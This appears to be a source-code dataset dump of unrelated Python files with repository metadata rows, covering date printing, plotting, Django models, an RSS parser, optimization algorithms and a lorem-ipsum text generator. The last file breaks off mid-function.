# 题目:输出指定格式的日期
import time
import datetime
# 目的在于熟悉这个模块
print time.ctime() # localtime
print time.asctime(time.localtime())
print time.asctime(time.gmtime()) # gmt
print datetime.datetime(2018, 8, 12)
# print datetime.tzinfo
print datetime.date.today()
print datetime.date.fromtimestamp.__doc__ | [
"jonathan1214@foxmail.com"
] | jonathan1214@foxmail.com |
fc88ba2c959cbb2126c1a6c8c7c8164e058a2dd8 | af25301cb505594b63dba2753c394e1660263e36 | /plot_ccf.py | 8360a3f180557cc2540ec7d5ad5fa753d270b01a | [] | no_license | nzarifi/tsmodels | 03229338d510daea3002bc03cabdc5c70bba658c | 243b8ff730d7c8817d2a3f292c040b8762ed2032 | refs/heads/master | 2023-02-02T01:02:12.035018 | 2020-12-15T13:25:57 | 2020-12-15T13:25:57 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,590 | py | import numpy as np
import pandas as pd
from math import sqrt
import matplotlib.pyplot as plt
def plot_ccf(x, y, lags=20, figsize=(14,6)):
    '''
    This function plots the cross correlation between two time series.

    x, y    : pandas Series (x.corr and y.shift are used); assumed to be
              aligned and of equal length — TODO confirm with callers.
    lags    : number of lags shown on each side of zero.
    figsize : forwarded to plt.figure.
    '''
    # Series names, used only for the plot title.
    xname = pd.DataFrame(x).columns.values[0]
    yname = pd.DataFrame(y).columns.values[0]

    # corr[i] = corr(x, y shifted by i - lags), for shifts in [-lags, lags).
    corr = np.array([x.corr(y.shift(i)) for i in range(-lags, lags)])

    # CALCULATING THE STANDARD ERROR AND THE CONFIDENCE INTERVALS
    # NOTE(review): Bartlett-style 95% bands; the right band accumulates
    # corr from the start and the left band from the end — confirm the
    # intended formula for negative lags.
    right = np.array([sqrt((1/len(x)) * (1 + 2 * sum(corr[:i]**2))) * 1.96 for i in range(1,lags+1)])
    lower_right = -right
    upper_right = right
    left = np.array([sqrt((1/len(x)) * (1 + 2 * sum(corr[-i::]**2))) * 1.96 for i in range(1,lags+1)])
    lower_left = -left[::-1]
    upper_left = left[::-1]

    # PLOTING THE CORRELATION
    plt.figure(figsize=figsize)
    # NOTE(review): use_line_collection was removed in matplotlib 3.8 —
    # this call requires an older matplotlib; confirm pinned version.
    plt.stem(corr,linefmt='cornflowerblue', markerfmt='bo', basefmt='cornflowerblue', label='Corr. Cruzada', use_line_collection=True)
    # Vertical marker at the zero-lag position (index == lags).
    plt.vlines(len(corr)/2, ymax=corr.max(), ymin=corr.min(), color='black', lw=3, alpha=1, label='Base Zero')
    plt.plot(corr.argmax(),corr.max(), 'o', markersize=8, color='red', label=f'Max Lag {int(len(corr)/2)-corr.argmax()}')
    plt.fill_between(range(lags,lags*2), lower_right,
                     upper_right, alpha=0.25, color='cornflowerblue')
    plt.fill_between(range(1,lags+1), lower_left,
                     upper_left, alpha=0.25, color='cornflowerblue')
    plt.title(f'Correlation Between {xname} and {yname} with {lags} lags')
    plt.legend()
    plt.show()
"noreply@github.com"
] | noreply@github.com |
71bbfff45e7ae85a6330b07e06dfb3bae056f560 | c7e9ee96c2a890aff28a0370146007d1ee62150e | /moviesite/analysitcs/models.py | fccd0d685a19a5e498813f58dce46017ddcd0428 | [] | no_license | ishikawa407/Moviesite | 768761724b4519d4ee2d4990adbf92d646f76573 | 56d2f04be9dc8b2f828a1a2444866ee90d726ed2 | refs/heads/master | 2022-12-10T10:15:46.109292 | 2019-07-14T15:27:37 | 2019-07-14T15:27:37 | 196,013,042 | 0 | 0 | null | 2022-12-08T01:22:36 | 2019-07-09T13:20:52 | HTML | UTF-8 | Python | false | false | 683 | py | from django.db import models
class Rating(models.Model):
    """A single (explicit or implicit) movie rating left by a user."""
    user_id = models.CharField(max_length=16)
    movie_id = models.CharField(max_length=16)
    rating = models.DecimalField(decimal_places=2, max_digits=4)
    rating_timestamp = models.DateTimeField()
    type = models.CharField(max_length=8, default='explicit')

    def __str__(self):
        return (f"user_id: {self.user_id}, movie_id: {self.movie_id}, "
                f"rating: {self.rating}, type: {self.type}")
class Cluster(models.Model):
    """Membership of one user in one similarity cluster."""
    cluster_id = models.IntegerField()
    user_id = models.IntegerField()

    def __str__(self):
        return f"{self.user_id} in {self.cluster_id}"
| [
"shimeng407@gmail.com"
] | shimeng407@gmail.com |
a1f44f892947d2880844171869bd61cf7fc59208 | 50cc8ba16cf08ecd5850440d34058c1abb05157b | /xml-parser-barrapunto.py | dda7852af16da98776f48ee23a4223e73602785b | [] | no_license | imfar/X-Serv-XML-Barrapunto | 243c648662a879689445156de9ccb37a9beb5197 | d796ab9e0f7eb15a10893d9f991b9fafe457d303 | refs/heads/master | 2020-03-13T14:32:59.020377 | 2018-04-26T18:25:44 | 2018-04-26T18:25:44 | 131,160,679 | 0 | 0 | null | 2018-04-26T13:35:24 | 2018-04-26T13:35:23 | null | UTF-8 | Python | false | false | 1,691 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Simple XML parser for the RSS channel from BarraPunto
# Jesus M. Gonzalez-Barahona
# jgb @ gsyc.es
# TSAI and SAT subjects (Universidad Rey Juan Carlos)
# September 2009
#
# Just prints the news (and urls) in BarraPunto.com,
# after reading the corresponding RSS channel.
from xml.sax.handler import ContentHandler
from xml.sax import make_parser
import sys
class myContentHandler(ContentHandler):
    """SAX handler that extracts each <item>'s <title>/<link> pair from
    the BarraPunto RSS feed and writes one HTML anchor per item to the
    module-level file handle `fd`.

    The current item's title is kept as instance state instead of the
    original module-level global, so the handler is self-contained.
    """

    def __init__(self):
        self.inItem = False        # inside an <item> element
        self.inContent = False     # inside a <title> or <link> we care about
        self.theContent = ""       # accumulated character data
        self.title = ""            # title of the current item

    def startElement(self, name, attrs):
        if name == 'item':
            self.inItem = True
        elif self.inItem:
            # Only capture text of title/link elements inside an item.
            if name == 'title' or name == 'link':
                self.inContent = True

    def endElement(self, name):
        if name == 'item':
            self.inItem = False
        elif self.inItem:
            if name == 'title':
                # RSS puts <title> before <link>, so remember it until
                # the link closes.
                self.title = self.theContent
                self.inContent = False
                self.theContent = ""
            elif name == 'link':
                link = "<a href='" + self.theContent + "'>" + self.title + "</a><br>"
                fd.write(link)
                self.inContent = False
                self.theContent = ""

    def characters(self, chars):
        # characters() may fire several times per element; accumulate.
        if self.inContent:
            self.theContent = self.theContent + chars
# Open the output HTML file and write the page header.
fd = open('index.html', 'w')
html_code = "<html><body><h1>PRACTICA SARO - 10.3. Titulares de BarraPunto</h1><p>"
fd.write(html_code)

# Module-level holder for the current item's title, shared with the handler.
title = ""

# Load parser and driver
theParser = make_parser()
theHandler = myContentHandler()
theParser.setContentHandler(theHandler)

# Ready, set, go! Fetch and parse the live RSS feed (network access).
theParser.parse("http://barrapunto.com/index.rss")

# Close the HTML page and the file.
fd.write("</p></body></html>")
print("Parse complete")
fd.close()
| [
"far9508@gmail.com"
] | far9508@gmail.com |
b63d3a9b7793acce97e3ced2c4196729f5895884 | 22e2a4e9392f8a33d18823ef039220ffdb5856d4 | /basic/wordcount.py | 423ee85665a2f24565d5cb65ec9f8daccfa5a920 | [
"Apache-2.0"
] | permissive | inyoka/google-python-exercises | 176961a2b69132d068c2c1731101ed26b9bde98b | 466b532a13d4634144bcdce361b1619a50b0152e | refs/heads/master | 2021-08-24T13:21:01.286377 | 2017-11-21T08:09:09 | 2017-11-21T08:09:09 | 111,513,334 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,166 | py | #!/usr/bin/python -tt
# Copyright 2010 Google Inc.
# Licensed under the Apache License, Version 2.0
# http://www.apache.org/licenses/LICENSE-2.0
# Google's Python Class
# http://code.google.com/edu/languages/google-python-class/
"""Wordcount exercise
Google's Python class
The main() below is already defined and complete. It calls print_words()
and print_top() functions which you write.
1. For the --count flag, implement a print_words(filename) function that counts
how often each word appears in the text and prints:
word1 count1
word2 count2
...
Print the above list in order sorted by word (python will sort punctuation to
come before letters -- that's fine). Store all the words as lowercase,
so 'The' and 'the' count as the same word.
2. For the --topcount flag, implement a print_top(filename) which is similar
to print_words() but which prints just the top 20 most common words sorted
so the most common word is first, then the next most common, and so on.
Use str.split() (no arguments) to split on all whitespace.
Workflow: don't build the whole program at once. Get it to an intermediate
milestone and print your data structure and sys.exit(0).
When that's working, try for the next milestone.
Optional: define a helper function to avoid code duplication inside
print_words() and print_top().
"""
import sys
# +++your code here+++
# Define print_words(filename) and print_top(filename) functions.
# You could write a helper utility function that reads a file
# and builds and returns a word/count dict for it.
# Then print_words() and print_top() can just call the utility function.
###
# This basic command line argument parsing code is provided and
# calls the print_words() and print_top() functions which you must define.
def main():
  """Command-line entry point.

  Usage: ./wordcount.py {--count | --topcount} file
  Dispatches to print_words() or print_top() (to be written by the student).
  """
  if len(sys.argv) != 3:
    print('usage: ./wordcount.py {--count | --topcount} file')
    sys.exit(1)

  option, filename = sys.argv[1], sys.argv[2]
  # Guard-clause style: handle each option and return immediately.
  if option == '--count':
    print_words(filename)
    return
  if option == '--topcount':
    print_top(filename)
    return
  print('unknown option: ' + option)
  sys.exit(1)
if __name__ == '__main__':
main()
| [
"simonmarkholland@gmail.com"
] | simonmarkholland@gmail.com |
46f4c190ec307f397e873c46ac6abca7c00b6cba | e616ea35ead674ebb4e67cae54768aaaeb7d89c9 | /project/alma/disciplines/migrations/0001_initial.py | cd2f83a805a6561b60a83706fe7cba9576acbc37 | [] | no_license | VWApplications/VWAlmaAPI | 12bb1888533cf987739b0e069737afa6337141e1 | 3a8009b17518384c269dfee3c8fe44cbe2567cc0 | refs/heads/master | 2022-04-02T10:26:49.832202 | 2020-02-12T04:46:31 | 2020-02-12T04:46:31 | 161,098,215 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,490 | py | # Generated by Django 2.1.4 on 2019-09-21 20:17
from django.conf import settings
import django.core.validators
from django.db import migrations, models
import django.db.models.deletion
import re
class Migration(migrations.Migration):
    """Auto-generated initial migration (Django 2.1.4): creates Discipline.

    NOTE: generated by `makemigrations`; edit with care — applied migrations
    must stay consistent with the recorded migration history.
    """

    initial = True

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]

    operations = [
        # Discipline: a course offering owned by one teacher, with enrolled
        # students and monitors (FK/M2M to the swappable user model).
        migrations.CreateModel(
            name='Discipline',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('title', models.CharField(help_text='Title of discipline', max_length=100, verbose_name='Title')),
                ('institution', models.CharField(help_text='University or School in which the user is inserted.', max_length=100, verbose_name='Institution')),
                ('course', models.CharField(help_text='Course that is ministered the discipline', max_length=100, verbose_name='Course')),
                ('description', models.TextField(help_text='Description of discipline', verbose_name='Description')),
                # Classroom label is validated against the pattern "Class A".."Class Z" (or "Turma A-Z").
                ('classroom', models.CharField(default='Class A', help_text='Classroom title of discipline.', max_length=10, validators=[django.core.validators.RegexValidator(re.compile('^Class|^Turma [A-Z]$'), "Enter a valid classroom, the classroom need to be 'Class A-Z'")], verbose_name='Classroom')),
                ('password', models.CharField(blank=True, help_text='Password to get into the class.', max_length=30, verbose_name='Password')),
                # Enrollment limits: 5-60 students, 0-5 monitors.
                ('students_limit', models.PositiveIntegerField(default=0, help_text='Students limit to get in the class.', validators=[django.core.validators.MaxValueValidator(60, 'There can be no more than %(limit_value)s students in the class.'), django.core.validators.MinValueValidator(5, 'Must have at least %(limit_value)s students in class.')], verbose_name='Students limit')),
                ('monitors_limit', models.PositiveIntegerField(default=0, help_text='Monitors limit to insert in the class.', validators=[django.core.validators.MaxValueValidator(5, 'There can be no more than %(limit_value)s monitors in the class.'), django.core.validators.MinValueValidator(0, 'Ensure this value is greater than or equal to %(limit_value)s.')], verbose_name='Monitors limit')),
                ('is_closed', models.BooleanField(default=False, help_text='Close discipline.', verbose_name='Is closed?')),
                ('created_at', models.DateTimeField(auto_now_add=True, help_text='Date that the discipline is created.', verbose_name='Created at')),
                ('updated_at', models.DateTimeField(auto_now=True, help_text='Date that the discipline is updated.', verbose_name='Updated at')),
                ('monitors', models.ManyToManyField(blank=True, related_name='monitor_classes', to=settings.AUTH_USER_MODEL, verbose_name='Monitors')),
                ('students', models.ManyToManyField(blank=True, related_name='student_classes', to=settings.AUTH_USER_MODEL, verbose_name='Students')),
                ('teacher', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='disciplines', related_query_name='discipline', to=settings.AUTH_USER_MODEL, verbose_name='Teacher')),
            ],
            options={
                'verbose_name': 'Discipline',
                'verbose_name_plural': 'Disciplines',
                'ordering': ['title', 'created_at'],
            },
        ),
    ]
| [
"victorhad@gmail.com"
] | victorhad@gmail.com |
8ac2ee19d3ffee62c28321a1125e6adee92ee362 | 6f15695787ca5fa482c0b95d79b24ad787e75e18 | /optimization.py | 153d71dde50e6e50f06c2ca4dfc4454db3df2e3e | [] | no_license | ingez/Programming_Collective_Intelligence | 04925e6776f3048ec8de452323dae4bf9ff2fd22 | d3062831a838f8546fb3ef05e5d051e5ccd3a480 | refs/heads/master | 2021-01-10T09:47:48.504799 | 2015-12-07T09:23:51 | 2015-12-07T09:23:51 | 44,954,589 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,168 | py | import time
import random
import math
# Travelers for the group-travel problem: (name, home airport code).
# Everyone flies to the shared destination and back on the same day.
people = [('Seymour', 'BOS'),
          ('Franny', 'DAL'),
          ('Zooey', 'CAK'),
          ('Walt', 'MIA'),
          ('Buddy', 'ORD'),
          ('Les', 'OMA')]

# LaGuardia Airport in New York.
# NOTE(review): the book's original code uses the code 'LGA'; 'IGA' here must
# match whatever codes appear in schedule.txt — confirm against that file.
destination = 'IGA'
flights = { }
# Load the flight schedule: each line is "origin, dest, depart, arrive, price".
# All flights for the same (origin, dest) pair are collected in one list.
# open() replaces the Python-2-only file() builtin (identical behavior in 2.x,
# and the code also runs under Python 3).
for line in open('schedule.txt'):
    origin, dest, depart, arrive, price = line.strip().split(', ')
    flights.setdefault((origin, dest), [ ])
    flights[(origin, dest)].append((depart, arrive, int(price)))
def getminutes(t):
    """Convert a clock string matching '%H: %M' (e.g. '8: 04') to minutes
    past midnight."""
    parsed = time.strptime(t, '%H: %M')
    return parsed.tm_hour * 60 + parsed.tm_min
def printschedule(r):
    """Print the chosen outbound/return flight for every traveler.

    r is a flat schedule: r[2*d] and r[2*d+1] index into the flights lists
    for person d's outbound and return flight respectively.

    Fix: uses print(...) and '//' so the function behaves identically on
    Python 2 and also runs on Python 3 (the original used the py2-only
    print statement and true division).
    """
    # Two entries per person, so len(r)//2 people are scheduled.
    for d in range(len(r) // 2):
        name = people[d][0]
        origin = people[d][1]
        out = flights[(origin, destination)][r[2 * d]]
        ret = flights[(destination, origin)][r[2 * d + 1]]
        print('%10s%10s %5s-%5s $%3s %5s-%5s $%3s' % (name, origin,
                                                      out[0], out[1], out[2],
                                                      ret[0], ret[1], ret[2]))
def schedulecost(sol):
    """Total cost of a schedule sol (flat list, two flight indices per person).

    Cost = ticket prices + total minutes spent waiting at the airports,
    plus a $50 car-rental penalty when the latest arrival is after the
    earliest departure (the car is kept an extra day).

    Bug fix: the original first loop iterated over `x` but indexed with the
    undefined name `d` (NameError); it now uses `d` consistently. Integer
    division uses '//' so the code also runs under Python 3.
    """
    totalprice = 0
    latestarrival = 0
    earliestdep = 24 * 60
    for d in range(len(sol) // 2):
        origin = people[d][1]
        outbound = flights[(origin, destination)][int(sol[2 * d])]
        returnf = flights[(destination, origin)][int(sol[2 * d + 1])]
        # Sum ticket prices for both directions.
        totalprice += outbound[2]
        totalprice += returnf[2]
        # Track when the last person arrives and the first one must leave.
        if latestarrival < getminutes(outbound[1]):
            latestarrival = getminutes(outbound[1])
        if earliestdep > getminutes(returnf[0]):
            earliestdep = getminutes(returnf[0])
    # Everyone waits until the last person arrives, and everyone must be at
    # the airport by the earliest departure on the way back.
    totalwait = 0
    for d in range(len(sol) // 2):
        origin = people[d][1]
        outbound = flights[(origin, destination)][int(sol[2 * d])]
        returnf = flights[(destination, origin)][int(sol[2 * d + 1])]
        totalwait += latestarrival - getminutes(outbound[1])
        totalwait += getminutes(returnf[0]) - earliestdep
    # Extra day of car rental if the group stays past the return deadline.
    if latestarrival > earliestdep:
        totalprice += 50
    return totalprice + totalwait
def randomoptimize(domain, costf):
    """Random search over domain (a list of inclusive (lo, hi) int ranges).

    Draws 100 random candidate solutions, scores each with costf, and
    returns the cheapest one seen.

    Bug fix: the original returned `r` — the *last* sample drawn — instead
    of `bestr`, the best sample found.
    """
    best = 999999999
    bestr = None
    for _ in range(100):
        # One candidate: an integer drawn uniformly per dimension.
        r = [random.randint(lo, hi) for (lo, hi) in domain]
        cost = costf(r)
        if cost < best:
            best = cost
            bestr = r
    return bestr
def hillclimb(domain, costf):
    """Greedy hill climbing from a random start in domain.

    Repeatedly moves to the cheapest neighbor (each coordinate +/- 1) and
    stops at a local optimum.

    Bug fix: the original inner loop compared an undefined name `cost` and
    assigned `sol = neighbors[j]` with a stale index `j`; each neighbor's
    cost is now evaluated explicitly.
    """
    # Random starting solution.
    sol = [random.randint(lo, hi) for (lo, hi) in domain]
    while 1:
        # All neighboring solutions: one coordinate moved by +/- 1,
        # staying inside the domain bounds.
        neighbors = []
        for j in range(len(domain)):
            if sol[j] > domain[j][0]:
                neighbors.append(sol[0:j] + [sol[j] - 1] + sol[j + 1:])
            if sol[j] < domain[j][1]:
                neighbors.append(sol[0:j] + [sol[j] + 1] + sol[j + 1:])
        # Move to the best neighbor, if any improves on the current solution.
        current = costf(sol)
        best = current
        for cand in neighbors:
            cost = costf(cand)
            if cost < best:
                best = cost
                sol = cand
        # Local optimum: no neighbor is better.
        if best == current:
            break
    return sol
def annealingoptimize(domain, costf, T=1000.0, cool=0.95, step=1):
    """Simulated annealing over domain (list of inclusive (lo, hi) ranges).

    Starting from a random float-valued solution, repeatedly perturbs one
    dimension by a random amount in [-step, step]; improvements are always
    accepted, while worse solutions are accepted with probability
    e^(-(eb-ea)/T), which shrinks as the temperature T cools by `cool`
    each iteration until T <= 0.1.
    """
    vec = [float(random.randint(lo, hi)) for (lo, hi) in domain]

    while T > 0.1:
        # Pick one dimension and a random step direction/size.
        i = random.randint(0, len(domain) - 1)
        change = random.randint(-step, step)

        # Candidate solution, clamped to the domain bounds.
        vecb = vec[:]
        vecb[i] += change
        if vecb[i] < domain[i][0]:
            vecb[i] = domain[i][0]
        elif vecb[i] > domain[i][1]:
            vecb[i] = domain[i][1]

        ea = costf(vec)
        eb = costf(vecb)
        # Accept improvements outright; otherwise accept with the annealing
        # probability (random.random() is only drawn when needed, matching
        # the short-circuit of the original).
        if eb < ea or random.random() < pow(math.e, -(eb - ea) / T):
            vec = vecb

        T = T * cool
    return vec
def geneticoptimize(domain, costf, popsize=50, step=1,
                    mutprob=0.2, elite=0.2, maxiter=100):
    """Genetic algorithm over domain (list of inclusive (lo, hi) int ranges).

    Evolves a population for maxiter generations: the top `elite` fraction
    survives unchanged, and the rest is refilled by mutating or crossing
    over elite members. Returns the best solution of the final generation.

    Bug fixes vs. the original:
    - crossover() referenced undefined names r1/r2 instead of its c1/c2 args.
    - mutate() could fall off the end and return None (e.g. when the chosen
      gene cannot move in the drawn direction); it now returns an unchanged
      copy instead.
    - print(...) form so the progress output also works on Python 3.
    """
    def mutate(vec):
        # Nudge one random gene by +/- step, staying inside the domain.
        i = random.randint(0, len(domain) - 1)
        if random.random() < 0.5 and vec[i] > domain[i][0]:
            return vec[0:i] + [vec[i] - step] + vec[i + 1:]
        elif vec[i] < domain[i][1]:
            return vec[0:i] + [vec[i] + step] + vec[i + 1:]
        # No legal move in the chosen direction: keep the vector unchanged.
        return vec[:]

    def crossover(c1, c2):
        # Splice the two parents at a random interior point.
        i = random.randint(1, len(domain) - 2)
        return c1[0:i] + c2[i:]

    # Initial population of random solutions.
    pop = []
    for _ in range(popsize):
        vec = [random.randint(lo, hi) for (lo, hi) in domain]
        pop.append(vec)

    # Number of winners promoted unchanged into each new generation.
    # (randint(0, topelite) below is inclusive, so index `topelite` — the
    # first non-elite — can also be picked, as in the original.)
    topelite = int(elite * popsize)

    for _ in range(maxiter):
        scores = [(costf(v), v) for v in pop]
        scores.sort()
        ranked = [v for (s, v) in scores]
        # Elitism: carry the best solutions over as-is.
        pop = ranked[0:topelite]
        # Refill the population by mutating or breeding ranked members.
        while len(pop) < popsize:
            if random.random() < mutprob:
                c = random.randint(0, topelite)
                pop.append(mutate(ranked[c]))
            else:
                c1 = random.randint(0, topelite)
                c2 = random.randint(0, topelite)
                pop.append(crossover(ranked[c1], ranked[c2]))
        # Progress: best cost of this generation.
        print(scores[0][0])
    return scores[0][1]
| [
"hznge@qq.com"
] | hznge@qq.com |
6117d1e662033b69ada4163ef95dad63dd91fca1 | 059c3bb5e0e8552f09768c3442b7af8614ca72f6 | /Lab7/CodingBat/Warmup-1/sum_double.py | 0bfcd81918208702cae91b103672123c1d6e5f38 | [] | no_license | tdinaraa/WebDev | 04ac88369cdf14e199841caf08a90723e73b4ccf | b99bdb93756b6a63b2835c0eee5b8d24309f7e00 | refs/heads/master | 2023-01-22T08:32:06.405670 | 2020-04-22T04:32:53 | 2020-04-22T04:32:53 | 240,984,305 | 0 | 0 | null | 2023-01-07T21:54:04 | 2020-02-16T23:41:57 | null | UTF-8 | Python | false | false | 90 | py | def sum_double(a, b):
sum = a + b
if a == b:
sum = sum * 2
return sum | [
"45028995+tdinaraa@users.noreply.github.com"
] | 45028995+tdinaraa@users.noreply.github.com |
85baa7b9dbc58edbbe2aa259e9295d59cbff831e | c7d98beb689410cbba2c712a01c25863f267b5dc | /scripts/python/experiments/cocktail_party/postprocessing/results_summary_helpers.py | de9dd4f0f44dc5b0a55a88047c2b7567c76adab6 | [] | no_license | ml4ai/hamlet_experiment_py2 | 2b8d5b21e9c3c62bc17409da4971869aaf13f705 | 2d49f797d0ee0baa0447e0965468e7c15e796bb7 | refs/heads/master | 2021-03-27T11:41:43.494446 | 2017-11-06T14:31:18 | 2017-11-06T14:31:18 | 61,496,702 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 4,207 | py | __author__ = 'clayton'
import collections
import os
import sys
import prettytable
from utilities import util
def append_data_to_dict(d, data_set_name, data_set_LT, data_set_LT_num, value):
# print d
if data_set_name not in d:
d[data_set_name] = collections.OrderedDict()
d[data_set_name][data_set_LT] = collections.OrderedDict()
d[data_set_name][data_set_LT][data_set_LT_num] = value
else:
if data_set_LT not in d[data_set_name]:
d[data_set_name][data_set_LT] = collections.OrderedDict()
d[data_set_name][data_set_LT][data_set_LT_num] = value
else:
d[data_set_name][data_set_LT][data_set_LT_num] = value
def print_dict(d):
for data_set_name, lt_dict in d.iteritems():
for data_set_LT, num_dict in lt_dict.iteritems():
print '{0} {1}:'.format(data_set_name, data_set_LT)
for n, val in num_dict.iteritems():
print ' {0}: {1}'.format(n, val)
def dict_to_prettytable(d, decimal_precision=3):
dfmtr = '{{0:.{0}f}}'.format(decimal_precision)
for data_set_name, lt_dict in d.iteritems():
for data_set_LT, lt_num_dict in lt_dict.iteritems():
header = [ 'Iteration' ] \
+ [ '{0}'.format(key) for key in lt_num_dict.keys() ]
table = prettytable.PrettyTable(header)
iteration_keys = util.OrderedSet()
for value_dict in lt_num_dict.itervalues():
for iter_key in value_dict.iterkeys():
iteration_keys.add(iter_key)
for iter_key in iteration_keys:
row = [ iter_key ]
for value_dict in lt_num_dict.itervalues():
if iter_key in value_dict:
value = value_dict[iter_key]
try:
value = float(value)
value = dfmtr.format(value)
except ValueError:
pass
else:
value = 'Null'
row.append(value)
# print row
table.add_row(row)
print '\n{0} {1}:'.format(data_set_name, data_set_LT)
print table
def display_experiment_summary_tables(data_root, results_file, depth=2):
owd = os.getcwd()
os.chdir(data_root)
all_data = collections.OrderedDict()
for dirName, subdirList, fileList in os.walk('.'):
dircomps = dirName.split('/')
if len(dircomps) == depth+1:
# print 'dirName:', dirName, 'subdirList:', subdirList, 'fileList:', fileList
data_set_name = '/'.join(dircomps[0:-1])
data_set_LT = dircomps[-1].split('_')
# print data_set_name, data_set_LT
if results_file in fileList:
data = collections.OrderedDict()
with open(dirName + '/' + results_file, 'r') as fin:
for line in fin.readlines():
comps = [ x.strip() for x in line.split(' ') ]
if comps[0] != 'iteration':
data[comps[0]] = comps[1]
append_data_to_dict(all_data, data_set_name, data_set_LT[0], data_set_LT[1], data)
# print_dict(all_data)
dict_to_prettytable(all_data)
os.chdir(owd)
'''
collect_files('../results/cocktail_no_learning/h10.0_cp0/',
'F1_score.txt',
depth=2)
'''
'''
collect_files('../results/cocktail/a1b1_nocs_cp0/',
'F1_score.txt',
depth=2)
'''
if __name__ == '__main__':
if len(sys.argv) == 1 or len(sys.argv) > 3:
print 'PRELIMINARY'
print 'usage: python collect_files.py <data_root> <results_file>'
print 'walks figures under data_root and collects and summarizes results_files found'
sys.exit(1)
data_root = '../results/cocktail_no_learning/h10.0_cp0/'
results_file = 'F1_score.txt'
if len(sys.argv) > 1:
data_root = sys.argv[1]
if len(sys.argv) > 2:
results_file = sys.argv[2]
display_experiment_summary_tables(data_root, results_file, depth=2)
| [
"claytonm@email.arizona.edu"
] | claytonm@email.arizona.edu |
49f0bec871aede1626dd9b0823050f24018b7413 | c703b8ac3b5545857f6c95efa2d61eaf7a664021 | /iPERCore/tools/human_digitalizer/deformers/__init__.py | e0d6c7b177b6946f7ec4806e5c0de347eece34a1 | [
"MIT",
"LicenseRef-scancode-unknown-license-reference",
"LicenseRef-scancode-proprietary-license",
"Apache-2.0",
"BSD-2-Clause"
] | permissive | iPERDance/iPERCore | d29681d229b3098b3517b1abf4f7ea65f579de73 | fcf9a18ffd66bf3fdd3eea4153a3bc4785131848 | refs/heads/main | 2023-07-30T15:04:15.835396 | 2023-04-12T14:21:23 | 2023-04-12T14:21:23 | 313,664,064 | 2,520 | 339 | Apache-2.0 | 2023-05-12T03:26:52 | 2020-11-17T15:36:25 | Python | UTF-8 | Python | false | false | 1,117 | py | # Copyright (c) 2020-2021 impersonator.org authors (Wen Liu and Zhixin Piao). All rights reserved.
import torch
from .sil_deformer import SilhouetteDeformer
from .clothlinks_deformer import ClothSmplLinkDeformer
def run_sil2smpl_offsets(obs_sils, init_smpls, image_size, device=torch.device("cuda:0"),
visualizer=None, visual_poses=None):
"""
Args:
obs_sils (np.ndarray):
init_smpls (np.ndarray):
image_size (int):
device (torch.device):
visualizer (None or Visualizer):
visual_poses (None or np.ndarray):
Returns:
"""
# 1. define Deformer Solver
deform_solver = SilhouetteDeformer(image_size=image_size, device=device)
# 2. format inputs for SilhouetteDeformer.solve()
cam = init_smpls[:, 0:3]
pose = init_smpls[:, 3:-10]
shape = init_smpls[:, -10:]
obs = {
"sil": obs_sils,
"cam": cam,
"pose": pose,
"shape": shape
}
# 3. solve the offsets
offsets = deform_solver.solve(obs, visualizer, visual_poses).cpu().detach().numpy()
return offsets
| [
"liuwen@shanghaitech.edu.cn"
] | liuwen@shanghaitech.edu.cn |
070cbe186db031be4d2e8086716849f26489871d | c3eaf59008279c05e4b7c72169ba3be762f5cce6 | /.venv/lib/python3.7/site-packages/sampledata/mixins/text_mixin.py | 739fae95a255c3a3fe117727dafae7e0ebb21a41 | [] | no_license | bogdanKukliuk/niceTest | b5e53fb9f313e3746dc93650eee9fb8caa74dd3d | 6c4ba8399959e6c0bca6b5a44a4914990f644773 | refs/heads/main | 2023-03-28T08:35:50.493460 | 2021-03-17T21:15:50 | 2021-03-17T21:15:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,537 | py | import random
import string
from ..exceptions import ParameterError
from sampledata import loremipsum
class TextMixin(object):
def word(self):
"""Random text with 1 word."""
return loremipsum.words(1, common=False)
def words(self, min_words=1, max_words=5):
"""Random text with 1 word."""
if min_words > max_words:
raise ParameterError('min_words greater than max_words')
words = random.randint(min_words, max_words)
return loremipsum.words(words, common=False)
def char(self):
"""Random character."""
return random.choice(string.ascii_letters)
def chars(self, min_chars=1, max_chars=5):
"""Random text with 1 word."""
if min_chars > max_chars:
raise ParameterError('min_chars greater than max_chars')
chars = random.randint(min_chars, max_chars)
result = ''
for _ in range(chars):
result += self.char()
return result
def email(self):
"""Random mail address."""
username = loremipsum.words(1, common=False)
domain = loremipsum.words(1, common=False)
termination = random.choice([u'.com', u'.org', u'.net'])
return "{0}@{1}{2}".format(username, domain, termination)
def url(self):
"""Random url."""
protocol = random.choice(["http", "https"])
domain = self.word()
termination = random.choice([u'.com', u'.org', u'.net'])
path = self.word()
return "{0}://{1}{2}/{3}".format(protocol, domain, termination, path)
def sentence(self):
"""Random sentence with text shorter than 255 characters."""
sentence = loremipsum.sentence()
while len(sentence) >= 255:
sentence = loremipsum.sentence()
return sentence
def short_sentence(self):
"""Random sentence with text shorter than 100 characters."""
sentence = loremipsum.sentence()
while len(sentence) >= 100:
sentence = loremipsum.sentence()
return sentence
def long_sentence(self):
"""Random sentence with text longer than 150 characters."""
sentence = loremipsum.sentence()
while len(sentence) <= 150:
sentence = loremipsum.sentence()
return sentence
def paragraph(self):
"""Random text with variable number of words, several sentences."""
return loremipsum.paragraph()
def paragraphs(self, min_paragraphs=1, max_paragraphs=5):
"""Random text with variable number of words, several sentences."""
if min_paragraphs > max_paragraphs:
raise ParameterError('min_paragraphs greater than max_paragraphs')
return "\n\n".join(loremipsum.paragraphs(random.randrange(min_paragraphs, max_paragraphs+1)))
def slug(self, min_words=5, max_words=5):
"""Random slug"""
if min_words > max_words:
raise ParameterError('min_words greater than max_words')
return "-".join([self.word() for x in range(self.int(max_value=max_words, min_value=min_words))])
def tags(self, min_tags=1, max_tags=5, tags_list=None):
if min_tags > max_tags:
raise ParameterError('min_tags greater than max_tags')
tags = []
for i in range(random.randrange(min_tags, max_tags+1)):
if tags_list:
